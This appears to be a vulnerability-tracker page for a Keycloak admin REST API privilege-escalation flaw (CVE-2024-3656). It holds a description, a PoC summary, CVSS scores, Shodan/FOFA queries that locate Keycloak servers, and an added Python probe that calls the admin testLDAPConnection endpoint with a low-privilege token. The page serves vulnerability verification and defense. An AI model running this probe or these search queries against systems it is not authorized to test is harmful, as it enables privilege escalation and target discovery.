CVE-2024-3656
Severity: HIGH | Nuclei template: available
Keycloak < 24.0.5 - Authenticated Privilege Escalation via Admin REST API Endpoints
Exploitation Summary
EIP tracks 1 public exploit for CVE-2024-3656. PoCs published by h4x0r-dz. A Nuclei detection template is also available.
AI-analyzed exploit summary
The h4x0r-dz repository provides a technical analysis of CVE-2024-3656, a Broken Access Control vulnerability in Keycloak < 24.0.5. It includes a patch diff analysis, reproduction steps, and HTTP request examples showing that the admin REST endpoint `testLDAPConnection` could be invoked with the token of a low-privilege user, because the endpoint did not enforce the realm-management authorization the rest of the admin API requires.
Description
A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.
Exploits (1)
h4x0r-dz: analysis repository with patch diff, reproduction steps and HTTP request examples against the `testLDAPConnection` endpoint (summarized above).
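The check below is an added example, not code from this page or from the h4x0r-dz repository. It obtains a token for a deliberately low-privilege user of the target realm (password grant through the built-in admin-cli client, which has direct access grants enabled by default) and then calls the admin endpoint with it. The endpoint path and the request body follow Keycloak's admin REST API as this editor knows it (POST /admin/realms/{realm}/testLDAPConnection with the TestLdapConnectionRepresentation fields); the field names are an assumption to verify against the version under test. The verdict logic is the security-relevant part: a patched server rejects the call with 403 before doing any LDAP work, while an unpatched server processes the attacker-supplied body (2xx, or 400 when the supplied LDAP URL cannot be reached). The probe uses a closed local port as the LDAP URL so that a vulnerable server fails fast instead of connecting anywhere real.

```python
"""Authorization probe for CVE-2024-3656 (Keycloak testLDAPConnection).

Added example, not code from the page or the h4x0r-dz repository.
Assumptions (verify against your Keycloak version): the admin endpoint is
POST /admin/realms/{realm}/testLDAPConnection and it accepts a JSON body
with the TestLdapConnectionRepresentation field names used below.
"""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

# Verdicts returned by classify_status(); constants so callers can compare.
FIXED = "fixed: endpoint enforces realm-management authorization (HTTP 403)"
AUTH_FAILED = "inconclusive: token rejected (HTTP 401); check user, realm, client"
REACHABLE = "vulnerable indicator: low-privilege token reached the endpoint"


def build_test_ldap_body(connection_url="ldap://127.0.0.1:1", timeout_ms=100):
    """Body for testLDAPConnection (field names assumed from Keycloak's
    TestLdapConnectionRepresentation). The URL points at a closed local
    port so an unpatched server fails fast instead of contacting a real
    LDAP host."""
    return {
        "action": "testConnection",
        "connectionUrl": connection_url,
        "bindDn": "",
        "bindCredential": "",
        "useTruststoreSpi": "never",
        "connectionTimeout": str(timeout_ms),
        "startTls": "false",
        "authType": "simple",
    }


def classify_status(status):
    """Map the probe's HTTP status to a verdict.
    Patched: 403 before any LDAP work. Unpatched: the body is processed,
    giving 2xx or 400 ("LDAP test error") for an unreachable URL."""
    if status == 403:
        return FIXED
    if status == 401:
        return AUTH_FAILED
    return REACHABLE


def is_vulnerable(status):
    """True when a low-privilege token was allowed to exercise the endpoint."""
    return classify_status(status) == REACHABLE


def get_token(base_url, realm, username, password, client_id="admin-cli"):
    """Password grant for a low-privilege user who belongs to `realm`."""
    data = urllib.parse.urlencode({
        "grant_type": "password",
        "client_id": client_id,
        "username": username,
        "password": password,
    }).encode()
    url = f"{base_url}/realms/{realm}/protocol/openid-connect/token"
    with urllib.request.urlopen(urllib.request.Request(url, data=data)) as resp:
        return json.load(resp)["access_token"]


def probe(base_url, realm, token):
    """Call the admin endpoint with the low-privilege token; return HTTP status."""
    url = f"{base_url}/admin/realms/{realm}/testLDAPConnection"
    req = urllib.request.Request(
        url,
        data=json.dumps(build_test_ldap_body()).encode(),
        headers={"Authorization": f"Bearer {token}",
                 "Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit(f"usage: {sys.argv[0]} BASE_URL REALM USERNAME PASSWORD")
    base, realm, user, pw = sys.argv[1:]
    status = probe(base, realm, get_token(base, realm, user, pw))
    print(status, classify_status(status))
```

Run it only against an instance you are authorized to test, with an account that holds no realm-management roles; a 403 is the expected result on 24.0.5 or later, while a 400 or 2xx means the endpoint accepted the unprivileged caller's body. A 401 says nothing about the flaw and usually means the user is not in the targeted realm or direct access grants are disabled on the client.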
Nuclei Templates (1)
Shodan query: http.favicon.hash:"-1105083093" || http.html:"keycloak" || http.title:"keycloak"
FOFA query: icon_hash=-1105083093 || body="keycloak" || title="keycloak"
Scores
CVSS 3.1 base score 8.1 (High): CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N